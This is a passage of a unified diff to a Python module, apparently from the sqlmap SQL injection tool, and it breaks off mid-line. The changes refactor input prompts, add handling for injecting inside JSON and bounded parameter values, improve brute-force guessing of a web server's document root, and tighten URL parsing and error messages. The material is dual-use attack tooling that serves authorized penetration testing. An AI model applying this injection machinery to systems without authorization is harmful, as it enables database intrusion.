else: warnMsg = "invalid value" @@ -369,12 +382,12 @@ class Backend: msg += "correct [%s (default)/%s] " % (kb.os, os) while True: - _ = readInput(msg, default=kb.os) + choice = readInput(msg, default=kb.os) - if _ == kb.os: + if choice == kb.os: break - elif _ == 
os: - kb.os = _.capitalize() + elif choice == os: + kb.os = choice.capitalize() break else: warnMsg = "invalid value" @@ -408,10 +421,10 @@ class Backend: msg += "\n[2] 64-bit" while True: - _ = readInput(msg, default='1') + choice = readInput(msg, default='1') - if isinstance(_, basestring) and _.isdigit() and int(_) in (1, 2): - kb.arch = 32 if int(_) == 1 else 64 + if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2): + kb.arch = 32 if int(choice) == 1 else 64 break else: warnMsg = "invalid value. Valid values are 1 and 2" @@ -456,6 +469,8 @@ class Backend: if not kb: pass + elif not kb.get("testMode") and conf.get("dbmsHandler") and getattr(conf.dbmsHandler, "_dbms", None): + dbms = conf.dbmsHandler._dbms elif Backend.getForcedDbms() is not None: dbms = Backend.getForcedDbms() elif Backend.getDbms() is not None: @@ -471,15 +486,17 @@ class Backend: @staticmethod def getVersion(): - if len(kb.dbmsVersion) > 0: - return kb.dbmsVersion[0] + versions = filter(None, flattenValue(kb.dbmsVersion)) + if not isNoneValue(versions): + return versions[0] else: return None @staticmethod def getVersionList(): - if len(kb.dbmsVersion) > 0: - return kb.dbmsVersion + versions = filter(None, flattenValue(kb.dbmsVersion)) + if not isNoneValue(versions): + return versions else: return None @@ -504,10 +521,9 @@ class Backend: # Comparison methods @staticmethod def isDbms(dbms): - if Backend.getDbms() is not None: - return Backend.getDbms() == aliasToDbmsEnum(dbms) - else: - return Backend.getIdentifiedDbms() == aliasToDbmsEnum(dbms) + if not kb.get("testMode") and all((Backend.getDbms(), Backend.getIdentifiedDbms())) and Backend.getDbms() != Backend.getIdentifiedDbms(): + singleTimeWarnMessage("identified ('%s') and fingerprinted ('%s') DBMSes differ. If you experience problems in enumeration phase please rerun with '--flush-session'" % (Backend.getIdentifiedDbms(), Backend.getDbms())) + return Backend.getIdentifiedDbms() == aliasToDbmsEnum(dbms) @staticmethod def isDbmsWithin(aliases): @@ -575,18 +591,18 @@ def paramToDict(place, parameters=None): if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken): _ = urldecode(testableParameters[parameter], convall=True) if (_.endswith("'") and _.count("'") == 1 - or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\ + or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _))\ and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): warnMsg = "it appears that you have provided tainted parameter values " - warnMsg += "('%s') with most probably leftover " % element + warnMsg += "('%s') with most likely leftover " % element warnMsg += "chars/statements from manual SQL injection test(s). " warnMsg += "Please, always use only valid parameter values " warnMsg += "so sqlmap could be able to run properly" logger.warn(warnMsg) message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] " - test = readInput(message, default="N") - if test[0] not in ("y", "Y"): + + if not readInput(message, default='N', boolean=True): raise SqlmapSilentQuitException elif not _: warnMsg = "provided value for parameter '%s' is empty. 
" % parameter @@ -594,27 +610,80 @@ def paramToDict(place, parameters=None): warnMsg += "so sqlmap could be able to run properly" logger.warn(warnMsg) - if conf.testParameter and not testableParameters: - paramStr = ", ".join(test for test in conf.testParameter) + if place in (PLACE.POST, PLACE.GET): + for regex in (r"\A((?:<[^>]+>)+\w+)((?:<[^>]+>)+)\Z", r"\A([^\w]+.*\w+)([^\w]+)\Z"): + match = re.search(regex, testableParameters[parameter]) + if match: + try: + candidates = OrderedDict() - if len(conf.testParameter) > 1: - warnMsg = "provided parameters '%s' " % paramStr - warnMsg += "are not inside the %s" % place - logger.warn(warnMsg) - else: - parameter = conf.testParameter[0] + def walk(head, current=None): + if current is None: + current = head + if isListLike(current): + for _ in current: + walk(head, _) + elif isinstance(current, dict): + for key in current.keys(): + value = current[key] + if isinstance(value, (list, tuple, set, dict)): + if value: + walk(head, value) + elif isinstance(value, (bool, int, float, basestring)): + original = current[key] + if isinstance(value, bool): + current[key] = "%s%s" % (str(value).lower(), BOUNDED_INJECTION_MARKER) + else: + current[key] = "%s%s" % (value, BOUNDED_INJECTION_MARKER) + candidates["%s (%s)" % (parameter, key)] = re.sub("(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized), parameters) + current[key] = original - if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True): - debugMsg = "provided parameter '%s' " % paramStr - debugMsg += "is not inside the %s" % place - logger.debug(debugMsg) + deserialized = json.loads(testableParameters[parameter]) + walk(deserialized) - elif len(conf.testParameter) != len(testableParameters.keys()): - for parameter in conf.testParameter: - if parameter not in testableParameters: - debugMsg = "provided parameter '%s' " % parameter - debugMsg += "is not inside the %s" % place - logger.debug(debugMsg) + if candidates: + message = "it appears that provided value for %s parameter '%s' " % (place, parameter) + message += "is JSON deserializable. Do you want to inject inside? [y/N] " + + if not readInput(message, default='N', boolean=True): + del testableParameters[parameter] + testableParameters.update(candidates) + break + except (KeyboardInterrupt, SqlmapUserQuitException): + raise + except Exception: + pass + + _ = re.sub(regex, "\g<1>%s\g<%d>" % (CUSTOM_INJECTION_MARK_CHAR, len(match.groups())), testableParameters[parameter]) + message = "it appears that provided value for %s parameter '%s' " % (place, parameter) + message += "has boundaries. Do you want to inject inside? 
('%s') [y/N] " % getUnicode(_) + + if readInput(message, default='N', boolean=True): + testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter]) + break + + if conf.testParameter: + if not testableParameters: + paramStr = ", ".join(test for test in conf.testParameter) + + if len(conf.testParameter) > 1: + warnMsg = "provided parameters '%s' " % paramStr + warnMsg += "are not inside the %s" % place + logger.warn(warnMsg) + else: + parameter = conf.testParameter[0] + + if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True): + debugMsg = "provided parameter '%s' " % paramStr + debugMsg += "is not inside the %s" % place + logger.debug(debugMsg) + + elif len(conf.testParameter) != len(testableParameters.keys()): + for parameter in conf.testParameter: + if parameter not in testableParameters: + debugMsg = "provided parameter '%s' " % parameter + debugMsg += "is not inside the %s" % place + logger.debug(debugMsg) if testableParameters: for parameter, value in testableParameters.items(): @@ -624,7 +693,7 @@ def paramToDict(place, parameters=None): decoded = value.decode(encoding) if len(decoded) > MIN_ENCODED_LEN_CHECK and all(_ in string.printable for _ in decoded): warnMsg = "provided parameter '%s' " % parameter - warnMsg += "seems to be '%s' encoded" % encoding + warnMsg += "appears to be '%s' encoded" % encoding logger.warn(warnMsg) break except: @@ -634,8 +703,6 @@ def paramToDict(place, parameters=None): def getManualDirectories(): directories = None - pagePath = directoryPath(conf.path) - defaultDocRoot = DEFAULT_DOC_ROOTS.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX]) if kb.absFilePaths: @@ -653,26 +720,30 @@ def getManualDirectories(): windowsDriveLetter, absFilePath = absFilePath[:2], absFilePath[2:] absFilePath = ntToPosixSlashes(posixToNtSlashes(absFilePath)) - if any("/%s/" % _ in absFilePath for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES): - for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES: - _ = "/%s/" % _ + for _ in list(GENERIC_DOC_ROOT_DIRECTORY_NAMES) + [conf.hostname]: + _ = "/%s/" % _ - if _ in absFilePath: - directories = "%s%s" % (absFilePath.split(_)[0], _) - break + if _ in absFilePath: + directories = "%s%s" % (absFilePath.split(_)[0], _) + break - if pagePath and pagePath in absFilePath: - directories = absFilePath.split(pagePath)[0] - if windowsDriveLetter: - directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories)) + if not directories and conf.path.strip('/') and conf.path in absFilePath: + directories = absFilePath.split(conf.path)[0] + + if directories and windowsDriveLetter: + directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories)) directories = normalizePath(directories) - if directories: + if conf.webRoot: + directories = [conf.webRoot] + infoMsg = "using '%s' as web server document root" % conf.webRoot + logger.info(infoMsg) + elif directories: infoMsg = "retrieved the web server document root: '%s'" % directories logger.info(infoMsg) else: - warnMsg = "unable to retrieve automatically the web server " + warnMsg = "unable to automatically retrieve the web server " warnMsg += "document root" logger.warn(warnMsg) @@ -683,17 +754,17 @@ def getManualDirectories(): message += "[2] custom location(s)\n" message += "[3] custom directory list file\n" message += "[4] brute force search" - choice = readInput(message, default="1").strip() + choice = readInput(message, default='1') - if choice == "2": + if choice == '2': message = "please provide a 
comma separate list of absolute directory paths: " directories = readInput(message, default="").split(',') - elif choice == "3": + elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message, default="") checkFile(listPath) directories = getFileItems(listPath) - elif choice == "4": + elif choice == '4': targets = set([conf.hostname]) _ = conf.hostname.split('.') @@ -711,9 +782,14 @@ def getManualDirectories(): for suffix in BRUTE_DOC_ROOT_SUFFIXES: for target in targets: - item = "%s/%s" % (prefix, suffix) + if not prefix.endswith("/%s" % suffix): + item = "%s/%s" % (prefix, suffix) + else: + item = prefix + item = item.replace(BRUTE_DOC_ROOT_TARGET_MARK, target).replace("//", '/').rstrip('/') - directories.append(item) + if item not in directories: + directories.append(item) if BRUTE_DOC_ROOT_TARGET_MARK not in prefix: break @@ -749,11 +825,6 @@ def getAutoDirectories(): warnMsg = "unable to automatically parse any web server path" logger.warn(warnMsg) - _ = extractRegexResult(r"//[^/]+?(?P/.*)/", conf.url) # web directory - - if _: - retVal.add(_) - return list(retVal) def filePathToSafeString(filePath): @@ -826,12 +897,12 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status= else: message = data - if hasattr(conf, "api"): - sys.stdout.write(message, status, content_type) - else: - sys.stdout.write(setColor(message, bold)) - try: + if conf.get("api"): + sys.stdout.write(message, status, content_type) + else: + sys.stdout.write(setColor(message, bold)) + sys.stdout.flush() except IOError: pass @@ -850,7 +921,7 @@ def dataToTrafficFile(data): conf.trafficFP.flush() except IOError, ex: errMsg = "something went wrong while trying " - errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex) + errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, getSafeExString(ex)) raise SqlmapSystemException(errMsg) def dataToDumpFile(dumpFile, data): @@ -861,27 +932,40 @@ def dataToDumpFile(dumpFile, data): if "No space left" in getUnicode(ex): errMsg = "no space left on output device" logger.error(errMsg) + elif "Permission denied" in getUnicode(ex): + errMsg = "permission denied when flushing dump data" + logger.error(errMsg) else: raise - def dataToOutFile(filename, data): retVal = None if data: - retVal = os.path.join(conf.filePath, filePathToSafeString(filename)) + while True: + retVal = os.path.join(conf.filePath, filePathToSafeString(filename)) - try: - with open(retVal, "w+b") as f: - f.write(data) - except IOError, ex: - errMsg = "something went wrong while trying to write " - errMsg += "to the output file ('%s')" % ex.message - raise SqlmapGenericException(errMsg) + try: + with open(retVal, "w+b") as f: # has to stay as non-codecs because data is raw ASCII encoded data + f.write(unicodeencode(data)) + except UnicodeEncodeError, ex: + _ = normalizeUnicode(filename) + if filename != _: + filename = _ + else: + errMsg = "couldn't write to the " + errMsg += "output file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) + except IOError, ex: + errMsg = "something went wrong while trying to write " + errMsg += "to the output file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) + else: + break return retVal -def readInput(message, default=None, checkBatch=True): +def readInput(message, default=None, checkBatch=True, boolean=False): """ Reads input from terminal """ @@ -906,19 +990,19 @@ def readInput(message, default=None, checkBatch=True): answer = 
item.split('=')[1] if len(item.split('=')) > 1 else None if answer and question.lower() in message.lower(): retVal = getUnicode(answer, UNICODE_ENCODING) + elif answer is None and retVal: + retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING)) - infoMsg = "%s%s" % (message, retVal) - logger.info(infoMsg) + if retVal: + dataToStdout("\r%s%s\n" % (message, retVal), forceOutput=True, bold=True) - debugMsg = "used the given answer" - logger.debug(debugMsg) - - break + debugMsg = "used the given answer" + logger.debug(debugMsg) if retVal is None: if checkBatch and conf.get("batch"): if isListLike(default): - options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default) + options = ','.join(getUnicode(opt, UNICODE_ENCODING) for opt in default) elif default: options = getUnicode(default, UNICODE_ENCODING) else: @@ -943,13 +1027,23 @@ def readInput(message, default=None, checkBatch=True): retVal = raw_input() or default retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal except: - time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893 - kb.prependFlag = True - raise SqlmapUserQuitException + try: + time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893 + except: + pass + finally: + kb.prependFlag = True + raise SqlmapUserQuitException finally: logging._releaseLock() + if retVal and default and isinstance(default, basestring) and len(default) == 1: + retVal = retVal.strip() + + if boolean: + retVal = retVal.strip().upper() == 'Y' + return retVal def randomRange(start=0, stop=1000, seed=None): @@ -961,7 +1055,12 @@ def randomRange(start=0, stop=1000, seed=None): 423 """ - randint = random.WichmannHill(seed).randint if seed is not None else random.randint + if seed is not None: + _ = getCurrentThreadData().random + _.seed(seed) + randint = _.randint + else: + randint = random.randint return int(randint(start, stop)) @@ -974,7 +1073,12 @@ def randomInt(length=4, seed=None): 874254 """ - choice = random.WichmannHill(seed).choice if seed is not None else random.choice + if seed is not None: + _ = getCurrentThreadData().random + _.seed(seed) + choice = _.choice + else: + choice = random.choice return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length))) @@ -987,7 +1091,12 @@ def randomStr(length=4, lowercase=False, alphabet=None, seed=None): 'RNvnAv' """ - choice = random.WichmannHill(seed).choice if seed is not None else random.choice + if seed is not None: + _ = getCurrentThreadData().random + _.seed(seed) + choice = _.choice + else: + choice = random.choice if alphabet: retVal = "".join(choice(alphabet) for _ in xrange(0, length)) @@ -1016,14 +1125,17 @@ def getHeader(headers, key): break return retVal -def checkFile(filename): +def checkFile(filename, raiseOnError=True): """ Checks for file existence and readability """ valid = True - if filename is None or not os.path.isfile(filename): + try: + if filename is None or not os.path.isfile(filename): + valid = False + except UnicodeError: valid = False if valid: @@ -1033,18 +1145,25 @@ def checkFile(filename): except: valid = False - if not valid: + if not valid and raiseOnError: raise SqlmapSystemException("unable to read file '%s'" % filename) + return valid + def banner(): """ This function prints sqlmap banner with its version """ - _ = BANNER - if not getattr(LOGGER_HANDLER, "is_tty", False): - _ = re.sub("\033.+?m", "", _) - dataToStdout(_, forceOutput=True) + if not any(_ in 
sys.argv for _ in ("--version", "--api")): + _ = BANNER + + if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv: + _ = re.sub("\033.+?m", "", _) + elif IS_WIN: + coloramainit() + + dataToStdout(_, forceOutput=True) def parsePasswordHash(password): """ @@ -1077,19 +1196,20 @@ def cleanQuery(query): for sqlStatements in SQL_STATEMENTS.values(): for sqlStatement in sqlStatements: - sqlStatementEsc = sqlStatement.replace("(", "\\(") - queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I) + queryMatch = re.search("(?i)\b(%s)\b" % sqlStatement.replace("(", "").replace(")", "").strip(), query) if queryMatch and "sys_exec" not in query: retVal = retVal.replace(queryMatch.group(1), sqlStatement.upper()) return retVal -def setPaths(): +def setPaths(rootPath): """ Sets absolute paths for project directories and files """ + paths.SQLMAP_ROOT_PATH = rootPath + # sqlmap paths paths.SQLMAP_EXTRAS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "extra") paths.SQLMAP_PROCS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "procs") @@ -1103,7 +1223,8 @@ paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads") _ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap") - paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding()) + paths.SQLMAP_HOME_PATH = _ + paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") @@ -1112,7 +1233,7 @@ paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst") paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst") paths.GITHUB_HISTORY = os.path.join(_, "github.hst") - paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr()) + paths.CHECKSUM_MD5 = os.path.join(paths.SQLMAP_TXT_PATH, "checksum.md5") paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt") paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt") paths.COMMON_OUTPUTS = os.path.join(paths.SQLMAP_TXT_PATH, 'common-outputs.txt') @@ -1151,11 +1272,13 @@ def parseTargetDirect(): if not conf.direct: return + conf.direct = conf.direct.encode(UNICODE_ENCODING) # some DBMS connectors (e.g. pymssql) don't like Unicode with non-US letters + details = None remote = False for dbms in SUPPORTED_DBMS: - details = re.search("^(?P<dbms>%s)://(?P<credentials>(?P<user>.+?)\:(?P<pass>.*)\@)?(?P<remote>(?P<hostname>.+?)\:(?P<port>[\d]+)\/)?(?P<db>[\w\d\ \:\.\_\-\/\\\\]+?)$" % dbms, conf.direct, re.I) + details = re.search("^(?P<dbms>%s)://(?P<credentials>(?P<user>.+?)\:(?P<pass>.*)\@)?(?P<remote>(?P<hostname>[\w.-]+?)\:(?P<port>[\d]+)\/)?(?P<db>[\w\d\ \:\.\_\-\/\\\\]+?)$" % dbms, conf.direct, re.I) if details: conf.dbms = details.group("dbms") @@ -1167,8 +1290,8 @@ if conf.dbmsCred: conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':') else: - conf.dbmsUser = unicode() - conf.dbmsPass = unicode() + conf.dbmsUser = "" + conf.dbmsPass = "" if not conf.dbmsPass: conf.dbmsPass = None @@ -1237,7 +1360,7 @@ else: errMsg = "sqlmap requires '%s' third-party library " % data[1] errMsg += "in order to directly connect to the DBMS " - errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2]) + errMsg += "'%s'. You can download it from '%s'" % (dbmsName, data[2]) errMsg += ". 
Alternative is to use a package 'python-sqlalchemy' " errMsg += "with support for dialect '%s' installed" % data[3] raise SqlmapMissingDependence(errMsg) @@ -1270,7 +1393,7 @@ def parseTargetUrl(): try: urlSplit = urlparse.urlsplit(conf.url) except ValueError, ex: - errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, ex) + errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, getSafeExString(ex)) errMsg += "Please be sure that you don't have any leftover characters (e.g. '[' or ']') " errMsg += "in the hostname part" raise SqlmapGenericException(errMsg) @@ -1291,8 +1414,8 @@ except UnicodeError: _ = None - if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'))): - errMsg = "invalid target URL" + if any((_ is None, re.search(r'\s', conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'), '\n' in originalUrl)): + errMsg = "invalid target URL ('%s')" % originalUrl raise SqlmapSyntaxException(errMsg) if len(hostnamePort) == 2: @@ -1306,22 +1429,29 @@ else: conf.port = 80 - if urlSplit.query: - conf.parameters[PLACE.GET] = urldecode(urlSplit.query) if urlSplit.query and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in urlSplit.query else urlSplit.query + if conf.port < 0 or conf.port > 65535: + errMsg = "invalid target URL's port (%d)" % conf.port + raise SqlmapSyntaxException(errMsg) conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path)) conf.url = conf.url.replace(URI_QUESTION_MARKER, '?') + if urlSplit.query: + if '=' not in urlSplit.query: + conf.url = "%s?%s" % (conf.url, getUnicode(urlSplit.query)) + else: + conf.parameters[PLACE.GET] = urldecode(urlSplit.query) if urlSplit.query and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in urlSplit.query else urlSplit.query + if not conf.referer and (intersect(REFERER_ALIASES, conf.testParameter, True) or conf.level >= 3): debugMsg = "setting the HTTP Referer header to the target URL" logger.debug(debugMsg) - conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders) + conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.REFERER] conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, ""))) if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5): debugMsg = "setting the HTTP Host header to the target URL" logger.debug(debugMsg) - conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders) + conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.HOST] conf.httpHeaders.append((HTTP_HEADER.HOST, getHostHeader(conf.url))) if conf.url != originalUrl: @@ -1367,7 +1497,7 @@ def expandAsteriskForColumns(expression): return expression -def getLimitRange(count, dump=False, plusOne=False): +def getLimitRange(count, plusOne=False): """ Returns range of values used in limit/offset constructs @@ -1379,7 +1509,7 @@ count = int(count) limitStart, limitStop = 1, count - if dump: + if kb.dumpTable: if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop: limitStop = conf.limitStop @@ -1442,7 +1572,7 @@ def parseFilePaths(page): """ if page: - for regex in (r" in (?P<result>.*?) 
on line", r"(?:>|\s)(?P[A-Za-z]:[\\/][\w.\\/]*)", r"(?:>|\s)(?P/\w[/\w.]+)"): + for regex in FILE_PATH_REGEXES: for match in re.finditer(regex, page): absFilePath = match.group("result").strip() page = page.replace(absFilePath, "") @@ -1584,9 +1714,10 @@ def safeExpandUser(filepath): try: retVal = os.path.expanduser(filepath) - except UnicodeDecodeError: + except UnicodeError: _ = locale.getdefaultlocale() - retVal = getUnicode(os.path.expanduser(filepath.encode(_[1] if _ and len(_) > 1 else UNICODE_ENCODING))) + encoding = _[1] if _ and len(_) > 1 else UNICODE_ENCODING + retVal = getUnicode(os.path.expanduser(filepath.encode(encoding)), encoding=encoding) return retVal @@ -1619,12 +1750,23 @@ def safeStringFormat(format_, params): index = retVal.find("%s", start) retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:] else: + if any('%s' in _ for _ in conf.parameters.values()): + parts = format_.split(' ') + for i in xrange(len(parts)): + if PAYLOAD_DELIMITER in parts[i]: + parts[i] = parts[i].replace(PAYLOAD_DELIMITER, "") + parts[i] = "%s%s" % (parts[i], PAYLOAD_DELIMITER) + break + format_ = ' '.join(parts) + count = 0 while True: match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal) if match: if count >= len(params): - raise Exception("wrong number of parameters during string formatting") + warnMsg = "wrong number of parameters during string formatting. " + warnMsg += "Please report by e-mail content \"%r | %r | %r\" to 'dev@sqlmap.org'" % (format_, params, retVal) + raise SqlmapValueException(warnMsg) else: retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1) count += 1 @@ -1632,7 +1774,7 @@ def safeStringFormat(format_, params): break return retVal -def getFilteredPageContent(page, onlyText=True): +def getFilteredPageContent(page, onlyText=True, split=" "): """ Returns filtered page content without script, style and/or comments or all HTML tags @@ -1645,10 +1787,10 @@ def getFilteredPageContent(page, onlyText=True): # only if the page's charset has been successfully identified if isinstance(page, unicode): - retVal = re.sub(r"(?si)||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), " ", page) - while retVal.find(" ") != -1: - retVal = retVal.replace(" ", " ") - retVal = htmlunescape(retVal.strip()) + retVal = re.sub(r"(?si)||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), split, page) + while retVal.find(2 * split) != -1: + retVal = retVal.replace(2 * split, split) + retVal = htmlunescape(retVal.strip().strip(split)) return retVal @@ -1724,7 +1866,7 @@ def posixToNtSlashes(filepath): 'C:\\\\Windows' """ - return filepath.replace('/', '\\') + return filepath.replace('/', '\\') if filepath else filepath def ntToPosixSlashes(filepath): """ @@ -1735,7 +1877,7 @@ def ntToPosixSlashes(filepath): 'C:/Windows' """ - return filepath.replace('\\', '/') + return filepath.replace('\\', '/') if filepath else filepath def isHexEncodedString(subject): """ @@ -1765,7 +1907,7 @@ def getConsoleWidth(default=80): FNULL = open(os.devnull, 'w') except IOError: FNULL = None - process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE) + process = subprocess.Popen("stty size", shell=True, stdout=subprocess.PIPE, stderr=FNULL or subprocess.PIPE) stdout, _ = process.communicate() items = stdout.split() @@ -1806,8 +1948,8 @@ def parseXmlFile(xmlFile, handler): with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream: parse(stream, handler) except (SAXParseException, UnicodeError), ex: - errMsg = 
"something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg @@ -1826,7 +1968,7 @@ def getSQLSnippet(dbms, sfile, **variables): retVal = readCachedFileContent(filename) retVal = re.sub(r"#.+", "", retVal) - retVal = re.sub(r"(?s);\s+", "; ", retVal).strip("\r\n") + retVal = re.sub(r";\s+", "; ", retVal).strip("\r\n") for _ in variables.keys(): retVal = re.sub(r"%%%s%%" % _, variables[_], retVal) @@ -1844,9 +1986,8 @@ def getSQLSnippet(dbms, sfile, **variables): logger.error(errMsg) msg = "do you want to provide the substitution values? [y/N] " - choice = readInput(msg, default="N") - if choice and choice[0].lower() == "y": + if readInput(msg, default='N', boolean=True): for var in variables: msg = "insert value for variable '%s': " % var val = readInput(msg, default="") @@ -1863,8 +2004,13 @@ def readCachedFileContent(filename, mode='rb'): with kb.locks.cache: if filename not in kb.cache.content: checkFile(filename) - with openFile(filename, mode) as f: - kb.cache.content[filename] = f.read() + try: + with openFile(filename, mode) as f: + kb.cache.content[filename] = f.read() + except (IOError, OSError, MemoryError), ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) return kb.cache.content[filename] @@ -1982,7 +2128,7 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un retVal.append(line) except (IOError, OSError, MemoryError), ex: errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (filename, ex) + errMsg += "to read the content of file '%s' ('%s')" % (filename, getSafeExString(ex)) raise SqlmapSystemException(errMsg) return retVal if not unique else retVal.keys() @@ -2107,21 +2253,20 @@ def getUnicode(value, encoding=None, noneToNull=False): if noneToNull and value is None: return NULL - if isListLike(value): - value = list(getUnicode(_, encoding, noneToNull) for _ in value) - return value - if isinstance(value, unicode): return value elif isinstance(value, basestring): while True: try: - return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING) + return unicode(value, encoding or (kb.get("pageEncoding") if kb.get("originalPage") else None) or UNICODE_ENCODING) except UnicodeDecodeError, ex: try: return unicode(value, UNICODE_ENCODING) except: value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] + elif isListLike(value): + value = list(getUnicode(_, encoding, noneToNull) for _ in value) + return value else: try: return unicode(value) @@ -2162,7 +2307,22 @@ def pushValue(value): Push value to the stack (thread dependent) """ - getCurrentThreadData().valueStack.append(copy.deepcopy(value)) + _ = None + success = False + + for i in xrange(PUSH_VALUE_EXCEPTION_RETRY_COUNT): + try: + getCurrentThreadData().valueStack.append(copy.deepcopy(value)) + success = True + break + except Exception, ex: + _ = ex + + if not success: + getCurrentThreadData().valueStack.append(None) + + if _: + raise _ def popValue(): """ @@ -2185,7 +2345,7 @@ def wasLastResponseDBMSError(): def wasLastResponseHTTPError(): """ - Returns True if the last web 
request resulted in an errornous HTTP code (like 500) + Returns True if the last web request resulted in an erroneous HTTP code (like 500) """ threadData = getCurrentThreadData() @@ -2200,30 +2360,33 @@ def wasLastResponseDelayed(): # response times should be inside +-7*stdev([normal response times]) # Math reference: http://www.answers.com/topic/standard-deviation - deviation = stdev(kb.responseTimes) + deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, [])) threadData = getCurrentThreadData() - if deviation and not conf.direct: - if len(kb.responseTimes) < MIN_TIME_RESPONSES: + if deviation and not conf.direct and not conf.disableStats: + if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: warnMsg = "time-based standard deviation method used on a model " warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES logger.warn(warnMsg) - lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation + lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit)) if not kb.testMode and retVal: if kb.adjustTimeDelay is None: msg = "do you want 